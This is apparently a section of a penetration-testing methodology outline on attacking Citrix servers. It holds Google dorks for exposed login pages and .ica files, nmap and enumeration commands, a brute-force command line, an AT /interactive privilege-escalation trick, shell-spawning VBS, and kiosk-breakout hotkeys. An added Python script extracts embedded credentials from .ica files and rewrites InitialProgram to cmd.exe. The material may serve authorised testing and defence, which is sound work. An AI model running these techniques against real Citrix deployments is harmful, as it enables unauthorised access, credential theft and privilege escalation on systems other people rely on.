20.2.1.2. Google Hacks (Author Discovered)
20.2.1.2.1. filetype:ica Username=
20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx
20.2.1.2.3. inurl:/Citrix/AccessPlatform/
20.2.1.2.4. inurl:LogonAgent/Login.asp
20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp
20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp
20.2.1.2.7. inurl:/Citrix/NFuse16
20.2.1.2.8. inurl:/Citrix/NFuse151/
20.2.1.2.9. allintitle:MetaFrame XP Login
20.2.1.2.10. allintitle:MetaFrame Presentation Server Login
20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login
20.2.1.3. Yahoo
20.2.1.3.1. originurlextension:ica
20.2.2. site search
20.2.2.1. Manual
20.2.2.1.1. review web page for useful information
20.2.2.1.2. review source for web page
20.2.3. generic
20.2.3.1. nmap -A -Pn -p 80,443,1494 ip_address
20.2.3.2. amap -bqv ip_address port_no.
20.2.4. citrix specific
20.2.4.1. enum.pl
20.2.4.1.1. perl enum.pl ip_address
20.2.4.2. enum.js
20.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address
20.2.4.3. connect.js
20.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application
20.2.4.4. Citrix-pa-scan
20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
20.2.4.5. pabrute.c
20.2.4.5.1. ./pabrute pubapp list app_list ip_address
20.2.5. Default Ports
20.2.5.1. TCP
20.2.5.1.1. 80 - Citrix XML Service
20.2.5.1.2. 135 - Advanced Management Console (DCOM/RPC)
20.2.5.1.3. 443 - Citrix SSL Relay
20.2.5.1.4. 1494 - ICA sessions
20.2.5.1.5. 2512 - Server to server (IMA)
20.2.5.1.6. 2513 - Management Console to server (IMA)
20.2.5.1.7. 2598 - Session Reliability (Auto-reconnect)
20.2.5.1.8. 8082 - License Management Console
20.2.5.1.9. 27000 - License server
20.2.5.2. UDP
20.2.5.2.1. 1604 - Clients to ICA browser service
20.2.5.2.2. 1604 - Server-to-server
20.2.6. nmap nse scripts
20.2.6.1. citrix-enum-apps
20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
20.2.6.2. citrix-enum-apps-xml
20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
20.2.6.3. citrix-enum-servers
20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>
20.2.6.4. citrix-enum-servers-xml
20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
20.2.6.5. citrix-brute-xml
20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
20.3. Scanning
20.3.1. Nessus
20.3.1.1. Plugins
20.3.1.1.1. CGI abuses
20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
20.3.1.1.3. Misc.
20.3.1.1.4. Service Detection
20.3.1.1.5. Web Servers
20.3.1.1.6. Windows
20.3.2. Nikto
20.3.2.1. perl nikto.pl -host ip_address -port port_no.
20.4. Exploitation
20.4.1. Alter default .ica files
20.4.1.1. InitialProgram=cmd.exe
20.4.1.2. InitialProgram=c:\windows\system32\cmd.exe
20.4.1.3. InitialProgram=explorer.exe
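Worked example, added here (not code from the original page): an auditor for the `.ica` files turned up by the `filetype:ica` searches in 20.2.1, which reads every published application's Address, InitialProgram and any embedded Username, Domain and Password, plus a helper that rewrites InitialProgram to `cmd.exe` as described above. The sample file is constructed; the application name, addresses and credential in it are placeholders. The same parser reads `appsrv.ini`, `pn.ini` and `wfclient.ini` (20.6), which use the same INI syntax.

```python
import configparser
import io


def parse_ica(text):
    """Parse .ica text (Windows INI syntax) keeping key case and literal '%' values."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                       # keep 'InitialProgram' as written
    cp.read_string(text)
    return cp


def audit_ica(text):
    """Report what an .ica file hands to anyone who downloads it."""
    cp = parse_ica(text)
    apps = {}
    findings = []
    if cp.has_option("WFClient", "TcpBrowserAddress"):
        findings.append("TcpBrowserAddress=%s: master browser address disclosed"
                        % cp["WFClient"]["TcpBrowserAddress"])
    names = list(cp["ApplicationServers"]) if cp.has_section("ApplicationServers") else []
    for app in names:
        sec = cp[app] if cp.has_section(app) else {}
        apps[app] = {
            "address": sec.get("Address"),
            "initial_program": sec.get("InitialProgram"),
            "username": sec.get("Username"),
            "domain": sec.get("Domain"),
        }
        if "ClearPassword" in sec:
            findings.append("%s: ClearPassword present (plaintext credential)" % app)
        elif "Password" in sec:
            findings.append("%s: Password present (reversibly encoded, not encrypted)" % app)
        if sec.get("InitialProgram", "").startswith("#"):
            findings.append("%s: published application %s; try replacing InitialProgram"
                            % (app, sec["InitialProgram"]))
    return {"apps": apps, "findings": findings}


def set_initial_program(text, program="cmd.exe"):
    """Return the .ica with every application's InitialProgram replaced (the technique above)."""
    cp = parse_ica(text)
    for app in cp["ApplicationServers"]:
        if not cp.has_section(app):
            cp.add_section(app)
        cp[app]["InitialProgram"] = program
    out = io.StringIO()
    cp.write(out, space_around_delimiters=False)   # Citrix clients expect Key=Value
    return out.getvalue()


# Constructed sample .ica for the example (not a real deployment's file).
SAMPLE_ICA = """\
[WFClient]
Version=2
ClientName=probe
TcpBrowserAddress=192.0.2.50

[ApplicationServers]
Notepad=

[Notepad]
Address=192.0.2.50
InitialProgram=#Notepad
Username=jdoe
Domain=CORP
ClearPassword=Winter2009
Compress=On
TWIMode=On
"""

if __name__ == "__main__":
    report = audit_ica(SAMPLE_ICA)
    print("\n".join(report["findings"]))
    print(set_initial_program(SAMPLE_ICA))
```

Whether the rewritten file actually lands you in a shell depends on the server: a farm that only allows launching the published application (rather than any InitialProgram the client names) will refuse it, which is the check to record either way.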
20.4.2. Enumerate and Connect
20.4.2.1. For applications identified by Citrix-pa-scan
20.4.2.1.1. Pas
20.4.2.2. For published applications with a Citrix client when the master browser is non-public.
20.4.2.2.1. Citrix-pa-proxy
20.4.3. Manual Testing
20.4.3.1. Create Batch File (cmd.bat)
20.4.3.2. Host Scripting File (cmd.vbs)
20.4.3.2.1. Option Explicit
20.4.3.2.2. Dim objShell
20.4.3.2.3. Set objShell = CreateObject("WScript.Shell")
20.4.3.2.4. objShell.Run "%comspec% /k"
20.4.3.2.5. WScript.Quit
20.4.3.2.6. alternative functionality
20.4.3.3. iKat
20.4.3.3.1. Integrated Kiosk Attack Tool
20.4.3.4. AT Command - privilege escalation
20.4.3.4.1. AT HH:MM /interactive "cmd.exe"
20.4.3.4.2. AT HH:MM /interactive %comspec% /k
20.4.3.5. Keyboard Shortcuts/ Hotkeys
20.4.3.5.1. Ctrl + h – View History
20.4.3.5.2. Ctrl + n – New Browser
20.4.3.5.3. Shift + Left Click – New Browser
20.4.3.5.4. Ctrl + o – Internet Address (browse feature)
20.4.3.5.5. Ctrl + p – Print (to file)
20.4.3.5.6. Right Click (Shift + F10)
20.4.3.5.7. F1 – Jump to URL
20.4.3.5.8. SHIFT+F1: Local Task List
20.4.3.5.9. SHIFT+F2: Toggle Title Bar
20.4.3.5.10. SHIFT+F3: Close Remote Application
20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
20.4.3.5.12. CTRL+F2: Remote Task List
20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
20.4.3.5.14. ALT+F2: Cycle through programs
20.4.3.5.15. ALT+PLUS: Alt+TAB
20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
20.5. Brute Force
20.5.1. bforce.js
20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
20.6. Review Configuration Files
20.6.1. Application server configuration file
20.6.1.1. appsrv.ini
20.6.1.1.1. Location
20.6.1.1.2. World writeable
20.6.1.1.3. Review other files
20.6.1.1.4. Sample file
20.6.2. Program Neighborhood configuration file
20.6.2.1. pn.ini
20.6.2.1.1. Location
20.6.2.1.2. Review other files
20.6.2.1.3. Sample file
20.6.3. Citrix ICA client configuration file
20.6.3.1. wfclient.ini
20.6.3.1.1. Location
20.6.3.1.2. Sample file
20.7. References
20.7.1. Vulnerabilities
20.7.1.1. Art of Hacking
20.7.1.2. Common Vulnerabilities and Exposures (CVE)
20.7.1.2.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
20.7.1.3. OSVDB
20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search
20.7.1.4. Secunia
20.7.1.4.1. http://secunia.com/advisories/search/?search=citrix
20.7.1.5. Security-database.com
20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
20.7.1.6. SecurityFocus
20.7.2. Support
20.7.2.1. Citrix
20.7.2.1.1. Knowledge Base
20.7.2.1.2. Forum
20.7.2.2. Thinworld
20.7.3. Exploits
20.7.3.1. Milw0rm
20.7.3.1.1. http://www.milw0rm.com/search.php
20.7.3.2. Art of Hacking
20.7.3.2.1. Citrix
20.7.4. Tutorials/ Presentations
20.7.4.1. Carnal0wnage
20.7.4.1.1. Carnal0wnage Blog: Citrix Hacking
20.7.4.2. Foundstone
20.7.4.2.1. Got Citrix, Hack IT
20.7.4.3. GNUCitizen
20.7.4.3.1. Hacking CITRIX - the forceful way
20.7.4.3.2. 0day: Hacking secured CITRIX from outside
20.7.4.3.3. CITRIX: Owning the Legitimate Backdoor
20.7.4.3.4. Remote Desktop Command Fixation Attacks
20.7.4.4. Packetstormsecurity
20.7.4.4.1. Hacking Citrix
20.7.4.5. Insomniac Security
20.7.4.5.1. Hacking Citrix
20.7.4.6. Aditya Sood
20.7.4.6.1. Rolling Balls - Can you hack clients
20.7.4.7. BlackHat
20.7.4.7.1. Client Side Security
20.7.5. Tools Resource
20.7.5.1. Zip file containing the majority of the tools mentioned in this article, for easy download and access